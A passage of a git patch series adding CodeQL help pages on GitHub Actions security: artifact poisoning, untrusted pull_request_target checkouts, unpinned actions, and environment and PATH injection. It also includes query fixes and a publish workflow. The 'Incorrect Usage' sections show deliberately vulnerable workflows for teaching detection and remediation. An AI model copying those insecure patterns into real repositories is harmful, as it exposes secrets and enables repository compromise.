+ +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - run: mkdir -p ${{ runner.temp }}/artifacts/ + - uses: dawidd6/action-download-artifact@v2 + with: + name: pr_number + path: ${{ runner.temp }}/artifacts/ + + - name: Run command + run: | + sh cmd.sh +``` + +## References + +- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/) diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md new file mode 100644 index 00000000000..2d7afb6b66e --- /dev/null +++ b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md @@ -0,0 +1,72 @@ +# Artifact poisoning + +## Description + +The workflow download artifacts that may be poisoned by an attacker in previously triggered workflows. If the contents of these artifacts are not correctly extracted, stored and verified, they may lead to repository compromise if untrusted code gets executed in a privileged job. + +## Recommendations + +- Always consider artifacts content as untrusted. +- Extract the contents of artifacts to a temporary folder so they cannot override existing files. +- Verify the contents of the artifacts downloaded. If an artifact is expected to contain a numeric value, verify it before using it. + +## Examples + +### Incorrect Usage + +The following workflow downloads an artifact that can potentially be controlled by an attacker and then runs an script from the runner workspace. Because the `dawidd6/action-download-artifact` by default downloads and extracts the contents of the artifacts overriding existing files. An attacker will be able to override the contents of `cmd.sh` and gain code execution when this file gets executed. + +```yaml +name: Insecure Workflow + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - uses: dawidd6/action-download-artifact@v2 + with: + name: pr_number + - name: Run command + run: | + sh cmd.sh +``` + +### Correct Usage + +The following example, correctly creates a temporary directory and stores the contents of the artifact there before calling `cmd.sh`. + +```yaml +name: Insecure Workflow + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - run: mkdir -p ${{ runner.temp }}/artifacts/ + - uses: dawidd6/action-download-artifact@v2 + with: + name: pr_number + path: ${{ runner.temp }}/artifacts/ + + - name: Run command + run: | + sh cmd.sh +``` + +## References + +- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/) diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.md b/ql/src/Security/CWE-829/UnpinnedActionsTag.md new file mode 100644 index 00000000000..eab708f8602 --- /dev/null +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.md @@ -0,0 +1,27 @@ +# Unpinned tag for 3rd party Action in workflow + +## Description + +Using a tag for a 3rd party Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack. + +## Recommendations + +Pinning an action to a full length commit SHA is currently the only way to use an action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as they would need to generate a SHA-1 collision for a valid Git object payload. When selecting a SHA, you should verify it is from the action's repository and not a repository fork. + +## Examples + +### Incorrect Usage + +```yaml +- uses: tj-actions/changed-files@v44 +``` + +### Correct Usage + +```yaml +- uses: tj-actions/changed-files@c65cd883420fd2eb864698a825fc4162dd94482c # v44 +``` + +## References + +- [Using third-party actions](https://docs.github.com/en/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions#using-third-party-actions) diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md new file mode 100644 index 00000000000..c391e1255ed --- /dev/null +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md @@ -0,0 +1,137 @@ +# Execution of Untrusted Checkedout Code + +## Description + +GitHub workflows can be triggered through various repository events, including incoming pull requests (PRs) or comments on Issues/PRs. A potentially dangerous misuse of the triggers such as `pull_request_target` or `issue_comment` followed by an explicit checkout of untrusted code (Pull Request HEAD) may lead to repository compromise if untrusted code gets executed in a privileged job. + +## Recommendations + +- Avoid using `pull_request_target` unless necessary. +- Employ unprivileged `pull_request` workflows followed by `workflow_run` for privileged operations. +- Use labels like `safe to test` to vet PRs and manage the execution context appropriately. + +The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second workflow should get triggered by the completion of the first one using `workflow_run` trigger event and access to repository secrets, so that it can download the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). + +The artifacts downloaded from the first workflow should be considered untrusted and verified. + +## Examples + +### Incorrect Usage + +The following workflow checks-out untrusted code in a privileged context and runs user-controlled code (in this case package.json scripts) which will grant privileged access to the attacker: + +```yaml +on: pull_request_target + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! +``` + +### Correct Usage + +An example shows how to use two workflows: one for processing the untrusted PR and the other for using the results in a safe context. + +**ReceivePR.yml** (untrusted PR handling with artifact creation): + +```yaml +name: Receive PR +on: + pull_request: +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - name: Build + run: /bin/bash ./build.sh + - name: Save PR number + run: | + mkdir -p ./pr + echo ${{ github.event.number }} > ./pr/NR + - uses: actions/upload-artifact@v2 + with: + name: pr + path: pr/ +``` + +**CommentPR.yml** (processing artifacts with privileged access): + +```yaml +name: Comment on the pull request +on: + workflow_run: + workflows: ["Receive PR"] + types: + - completed +jobs: + upload: + runs-on: ubuntu-latest + if: > + github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' + steps: + - name: "Download artifact" + uses: actions/github-script@v3.1.0 + with: + script: | + var artifacts = await github.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{github.event.workflow_run.id }}, + }); + var matchArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "pr"; + })[0]; + var download = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(download.data)); + - run: | + mkdir -p tmp + unzip -d tmp/ pr.zip + - name: "Comment on PR" + uses: actions/github-script@v3 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + script: | + var fs = require('fs'); + var issue_number = Number(fs.readFileSync('./tmp/NR')); + // Verify that the file contains a numeric value + const contains_numeric = /\d/.test(issue_number); + if (contains_numeric) { + await github.issues.createComment({ + owner: context.repo.owner, + repo: context.repo.repo, + issue_number: issue_number, + body: 'Everything is OK. Thank you for the PR!' + }); + } +``` + +## References + +- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/) diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md new file mode 100644 index 00000000000..c391e1255ed --- /dev/null +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md @@ -0,0 +1,137 @@ +# Execution of Untrusted Checkedout Code + +## Description + +GitHub workflows can be triggered through various repository events, including incoming pull requests (PRs) or comments on Issues/PRs. A potentially dangerous misuse of the triggers such as `pull_request_target` or `issue_comment` followed by an explicit checkout of untrusted code (Pull Request HEAD) may lead to repository compromise if untrusted code gets executed in a privileged job. + +## Recommendations + +- Avoid using `pull_request_target` unless necessary. +- Employ unprivileged `pull_request` workflows followed by `workflow_run` for privileged operations. +- Use labels like `safe to test` to vet PRs and manage the execution context appropriately. + +The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second workflow should get triggered by the completion of the first one using `workflow_run` trigger event and access to repository secrets, so that it can download the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). + +The artifacts downloaded from the first workflow should be considered untrusted and verified. + +## Examples + +### Incorrect Usage + +The following workflow checks-out untrusted code in a privileged context and runs user-controlled code (in this case package.json scripts) which will grant privileged access to the attacker: + +```yaml +on: pull_request_target + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! +``` + +### Correct Usage + +An example shows how to use two workflows: one for processing the untrusted PR and the other for using the results in a safe context. + +**ReceivePR.yml** (untrusted PR handling with artifact creation): + +```yaml +name: Receive PR +on: + pull_request: +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - name: Build + run: /bin/bash ./build.sh + - name: Save PR number + run: | + mkdir -p ./pr + echo ${{ github.event.number }} > ./pr/NR + - uses: actions/upload-artifact@v2 + with: + name: pr + path: pr/ +``` + +**CommentPR.yml** (processing artifacts with privileged access): + +```yaml +name: Comment on the pull request +on: + workflow_run: + workflows: ["Receive PR"] + types: + - completed +jobs: + upload: + runs-on: ubuntu-latest + if: > + github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' + steps: + - name: "Download artifact" + uses: actions/github-script@v3.1.0 + with: + script: | + var artifacts = await github.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{github.event.workflow_run.id }}, + }); + var matchArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "pr"; + })[0]; + var download = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(download.data)); + - run: | + mkdir -p tmp + unzip -d tmp/ pr.zip + - name: "Comment on PR" + uses: actions/github-script@v3 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + script: | + var fs = require('fs'); + var issue_number = Number(fs.readFileSync('./tmp/NR')); + // Verify that the file contains a numeric value + const contains_numeric = /\d/.test(issue_number); + if (contains_numeric) { + await github.issues.createComment({ + owner: context.repo.owner, + repo: context.repo.repo, + issue_number: issue_number, + body: 'Everything is OK. Thank you for the PR!' + }); + } +``` + +## References + +- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/) diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md new file mode 100644 index 00000000000..c391e1255ed --- /dev/null +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md @@ -0,0 +1,137 @@ +# Execution of Untrusted Checkedout Code + +## Description + +GitHub workflows can be triggered through various repository events, including incoming pull requests (PRs) or comments on Issues/PRs. A potentially dangerous misuse of the triggers such as `pull_request_target` or `issue_comment` followed by an explicit checkout of untrusted code (Pull Request HEAD) may lead to repository compromise if untrusted code gets executed in a privileged job. + +## Recommendations + +- Avoid using `pull_request_target` unless necessary. +- Employ unprivileged `pull_request` workflows followed by `workflow_run` for privileged operations. +- Use labels like `safe to test` to vet PRs and manage the execution context appropriately. + +The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second workflow should get triggered by the completion of the first one using `workflow_run` trigger event and access to repository secrets, so that it can download the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). + +The artifacts downloaded from the first workflow should be considered untrusted and verified. + +## Examples + +### Incorrect Usage + +The following workflow checks-out untrusted code in a privileged context and runs user-controlled code (in this case package.json scripts) which will grant privileged access to the attacker: + +```yaml +on: pull_request_target + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! +``` + +### Correct Usage + +An example shows how to use two workflows: one for processing the untrusted PR and the other for using the results in a safe context. + +**ReceivePR.yml** (untrusted PR handling with artifact creation): + +```yaml +name: Receive PR +on: + pull_request: +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - name: Build + run: /bin/bash ./build.sh + - name: Save PR number + run: | + mkdir -p ./pr + echo ${{ github.event.number }} > ./pr/NR + - uses: actions/upload-artifact@v2 + with: + name: pr + path: pr/ +``` + +**CommentPR.yml** (processing artifacts with privileged access): + +```yaml +name: Comment on the pull request +on: + workflow_run: + workflows: ["Receive PR"] + types: + - completed +jobs: + upload: + runs-on: ubuntu-latest + if: > + github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' + steps: + - name: "Download artifact" + uses: actions/github-script@v3.1.0 + with: + script: | + var artifacts = await github.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{github.event.workflow_run.id }}, + }); + var matchArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "pr"; + })[0]; + var download = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(download.data)); + - run: | + mkdir -p tmp + unzip -d tmp/ pr.zip + - name: "Comment on PR" + uses: actions/github-script@v3 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + script: | + var fs = require('fs'); + var issue_number = Number(fs.readFileSync('./tmp/NR')); + // Verify that the file contains a numeric value + const contains_numeric = /\d/.test(issue_number); + if (contains_numeric) { + await github.issues.createComment({ + owner: context.repo.owner, + repo: context.repo.repo, + issue_number: issue_number, + body: 'Everything is OK. Thank you for the PR!' + }); + } +``` + +## References + +- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/) From 569e80b6784cece7a90f1ac70585d2e6dbfee133 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Aug 2024 17:17:18 +0200 Subject: [PATCH 0470/1267] Fix ImproperAccess query --- ql/src/Security/CWE-285/ImproperAccessControl.ql | 13 +++++++++---- .../Security/CWE-285/ImproperAccessControl.expected | 2 +- 2 files changed, 10 insertions(+), 5 deletions(-) diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.ql b/ql/src/Security/CWE-285/ImproperAccessControl.ql index 2c7882604b2..ba002f16a87 100644 --- a/ql/src/Security/CWE-285/ImproperAccessControl.ql +++ b/ql/src/Security/CWE-285/ImproperAccessControl.ql @@ -17,9 +17,14 @@ import codeql.actions.security.ControlChecks from LocalJob job, LabelCheck check, MutableRefCheckoutStep checkout, Event event where job.isPrivileged() and - job.getATriggerEvent() = event and - event.getName() = "pull_request_target" and - event.getAnActivityType() = "synchronize" and - check.dominates(checkout) + job.getAStep() = checkout and + check.dominates(checkout) and + ( + job.getATriggerEvent() = event and + event.getName() = "pull_request_target" and + event.getAnActivityType() = "synchronize" + or + not exists(job.getATriggerEvent()) + ) select checkout, "The checked-out code can be modified after the authorization check $@.", check, check.toString() diff --git a/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected b/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected index 53dd12b9fb6..92f87dc1f35 100644 --- a/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected +++ b/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected @@ -1 +1 @@ -| .github/workflows/test1.yml:15:7:20:4 | Uses Step | The checked-out code can be changed after the authorization check o step $@. | .github/workflows/test1.yml:17:11:17:75 | contain ... test') | contain ... test') | +| .github/workflows/test1.yml:15:7:20:4 | Uses Step | The checked-out code can be modified after the authorization check $@. | .github/workflows/test1.yml:17:11:17:75 | contain ... test') | contain ... test') | From d166b7c03a085c4a2ee79a7f0015aacdc9b31b9e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Aug 2024 17:34:42 +0200 Subject: [PATCH 0471/1267] Create publish.yml --- .github/workflows/publish.yml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 .github/workflows/publish.yml diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml new file mode 100644 index 00000000000..390d6845345 --- /dev/null +++ b/.github/workflows/publish.yml @@ -0,0 +1,26 @@ +name: Publish +on: + workflow_dispatch: + +jobs: + tests: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + - name: Fetch CodeQL + shell: bash + env: + GITHUB_TOKEN: ${{ github.token }} + run: | + gh extension install github/gh-codeql + gh codeql set-channel "nightly" + gh codeql version + printf "CODEQL_FETCHED_CODEQL_PATH=" >> "${GITHUB_ENV}" + gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_ENV}" + gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_PATH}" + - name: Publish + env: + GITHUB_TOKEN: ${{ secrets.GHCR_TOKEN }} + run: | + codeql pack publish ql/lib + codeql pack publish ql/src From 2b8169b000780fd82fd69bccc460e10db0160cd1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Aug 2024 17:37:52 +0200 Subject: [PATCH 0472/1267] Update publish.yml --- .github/workflows/publish.yml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml index 390d6845345..b09112f2fdd 100644 --- a/.github/workflows/publish.yml +++ b/.github/workflows/publish.yml @@ -18,6 +18,14 @@ jobs: printf "CODEQL_FETCHED_CODEQL_PATH=" >> "${GITHUB_ENV}" gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_ENV}" gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_PATH}" + - name: Install Packs + env: + GITHUB_TOKEN: ${{ github.token }} + run: | + gh repo clone github/codeql + codeql pack install "ql/lib" + codeql pack install "ql/src" + codeql pack install "ql/test" - name: Publish env: GITHUB_TOKEN: ${{ secrets.GHCR_TOKEN }} From 23754b6d2f7868fdde57588f38cb8ad58547ce3f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Aug 2024 17:38:57 +0200 Subject: [PATCH 0473/1267] Update publish.yml --- .github/workflows/publish.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml index b09112f2fdd..bfe87d1056c 100644 --- a/.github/workflows/publish.yml +++ b/.github/workflows/publish.yml @@ -3,7 +3,7 @@ on: workflow_dispatch: jobs: - tests: + publish: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 From cc6badaea6fd22a4074da7e2f0717ff75ad28f0b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Sat, 10 Aug 2024 09:54:23 +0000 Subject: [PATCH 0474/1267] grammar --- ql/src/Security/CWE-077/EnvPathInjectionCritical.md | 2 +- ql/src/Security/CWE-077/EnvPathInjectionMedium.md | 2 +- ql/src/Security/CWE-077/EnvVarInjectionCritical.md | 2 +- ql/src/Security/CWE-077/EnvVarInjectionMedium.md | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md index 1891d41fa39..88cc06de90a 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md @@ -2,7 +2,7 @@ ## Description -GitHub Actions allows to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g. +GitHub Actions allow to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g. ```bash echo "$HOME/.local/bin" >> $GITHUB_PATH diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md index 1891d41fa39..88cc06de90a 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md +++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md @@ -2,7 +2,7 @@ ## Description -GitHub Actions allows to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g. +GitHub Actions allow to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g. ```bash echo "$HOME/.local/bin" >> $GITHUB_PATH diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.md b/ql/src/Security/CWE-077/EnvVarInjectionCritical.md index 1d33a014d4b..a16b41e3970 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.md +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.md @@ -2,7 +2,7 @@ ## Description -GitHub Actions allows to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: +GitHub Actions allow to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: This file should lines in the `KEY=VALUE` format: diff --git a/ql/src/Security/CWE-077/EnvVarInjectionMedium.md b/ql/src/Security/CWE-077/EnvVarInjectionMedium.md index 1d33a014d4b..a16b41e3970 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionMedium.md +++ b/ql/src/Security/CWE-077/EnvVarInjectionMedium.md @@ -2,7 +2,7 @@ ## Description -GitHub Actions allows to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: +GitHub Actions allow to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: This file should lines in the `KEY=VALUE` format: From 77ecca9f5e8951d26f9d7bfde8f3b8f1b11b0bc2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Sat, 10 Aug 2024 10:17:40 +0000 Subject: [PATCH 0475/1267] grammar --- ql/src/Security/CWE-077/EnvPathInjectionCritical.md | 8 +++++--- ql/src/Security/CWE-077/EnvPathInjectionMedium.md | 8 +++++--- 2 files changed, 10 insertions(+), 6 deletions(-) diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md index 88cc06de90a..ae9afbb76f4 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md @@ -2,17 +2,19 @@ ## Description -GitHub Actions allow to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g. +GitHub Actions allow to define the system PATH variable by writing to a file pointed by the `GITHUB_PATH` environment variable. Writing to this file appends a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. + +E.g.: ```bash echo "$HOME/.local/bin" >> $GITHUB_PATH ``` -If an attacker can control the contents of the path being assigned to the system PATH, they will be able to influence what commands are run in subsequen steps of the same job. +If an attacker can control the contents of the system PATH, they are able to influence what commands are run in subsequent steps of the same job. ## Recommendations -- Do Not Allow Untrusted Data to Influence The System PATH: Avoid using untrusted data sources (e.g., artifact content) to define the system PATH. +Do not allow untrusted data to influence the system PATH: Avoid using untrusted data sources (e.g., artifact content) to define the system PATH. ## Examples diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md index 88cc06de90a..ae9afbb76f4 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md +++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md @@ -2,17 +2,19 @@ ## Description -GitHub Actions allow to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g. +GitHub Actions allow to define the system PATH variable by writing to a file pointed by the `GITHUB_PATH` environment variable. Writing to this file appends a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. + +E.g.: ```bash echo "$HOME/.local/bin" >> $GITHUB_PATH ``` -If an attacker can control the contents of the path being assigned to the system PATH, they will be able to influence what commands are run in subsequen steps of the same job. +If an attacker can control the contents of the system PATH, they are able to influence what commands are run in subsequent steps of the same job. ## Recommendations -- Do Not Allow Untrusted Data to Influence The System PATH: Avoid using untrusted data sources (e.g., artifact content) to define the system PATH. +Do not allow untrusted data to influence the system PATH: Avoid using untrusted data sources (e.g., artifact content) to define the system PATH. ## Examples From a282818272a8312dbe8a97725c5c04dd5f4f46d0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Sat, 10 Aug 2024 10:52:06 +0000 Subject: [PATCH 0476/1267] grammar --- .../CWE-077/EnvPathInjectionCritical.md | 2 +- .../CWE-077/EnvPathInjectionMedium.md | 2 +- .../CWE-077/EnvVarInjectionCritical.md | 58 +++++++++---------- .../Security/CWE-077/EnvVarInjectionMedium.md | 58 +++++++++---------- 4 files changed, 60 insertions(+), 60 deletions(-) diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md index ae9afbb76f4..436cf685996 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md @@ -2,7 +2,7 @@ ## Description -GitHub Actions allow to define the system PATH variable by writing to a file pointed by the `GITHUB_PATH` environment variable. Writing to this file appends a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. +GitHub Actions allow to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file appends a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g.: diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md index ae9afbb76f4..436cf685996 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md +++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md @@ -2,7 +2,7 @@ ## Description -GitHub Actions allow to define the system PATH variable by writing to a file pointed by the `GITHUB_PATH` environment variable. Writing to this file appends a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. +GitHub Actions allow to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file appends a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g.: diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.md b/ql/src/Security/CWE-077/EnvVarInjectionCritical.md index a16b41e3970..cc35402b804 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.md +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.md @@ -2,9 +2,9 @@ ## Description -GitHub Actions allow to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: +GitHub Actions allow to define environment variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: -This file should lines in the `KEY=VALUE` format: +This file contains lines in the `KEY=VALUE` format: ```bash steps: @@ -14,7 +14,7 @@ steps: echo "action_state=yellow" >> "$GITHUB_ENV" ``` -It is also possible to define a multiline variables by using the following format: +It is also possible to define multiline variables by using the [following construct](https://en.wikipedia.org/wiki/Here_document): ``` KEY<<{delimiter} @@ -35,40 +35,40 @@ steps: } >> "$GITHUB_ENV" ``` -If an attacker can control the contents of the values assigned to these variables and these are not properly sanitized, they will be able to inject additional variables by injecting new lines or `{delimiters}`. +If an attacker can control the values assigned to environment variables and there is no sanitization in place, the attacker will be able to inject additional variables by injecting new lines or `{delimiters}`. ## Recommendations -1. **Do Not Allow Untrusted Data to Influence Environment Variables**: +1. **Do not allow untrusted data to influence environment variables**: -- Avoid using untrusted data sources (e.g., artifact content) to define environment variables. -- Validate and sanitize all inputs before using them in environment settings. + - Avoid using untrusted data sources (e.g., artifact content) to define environment variables. + - Validate and sanitize all inputs before using them in environment settings. -2. **Do Not Allow New Lines When Defining Single Line Environment Variables**: +2. **Do not allow new lines when defining single line environment variables**: -- `echo "BODY=$(echo "$BODY" | tr -d '\n')" >> "$GITHUB_ENV"` + - `echo "BODY=$(echo "$BODY" | tr -d '\n')" >> "$GITHUB_ENV"` -3. **Use Unique Identifiers When Defining Multi Line Environment Variables**: +3. **Use unique identifiers when defining multi line environment variables**: -```bash -steps: - - name: Set the value in bash - id: step_one - run: | - # Generate a UUID - UUID=$(uuidgen) - { - echo "JSON_RESPONSE<> "$GITHUB_ENV" -``` + ```bash + steps: + - name: Set the value in bash + id: step_one + run: | + # Generate a UUID + UUID=$(uuidgen) + { + echo "JSON_RESPONSE<> "$GITHUB_ENV" + ``` ## Examples ### Example of Vulnerability -Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps: +Consider the following basic 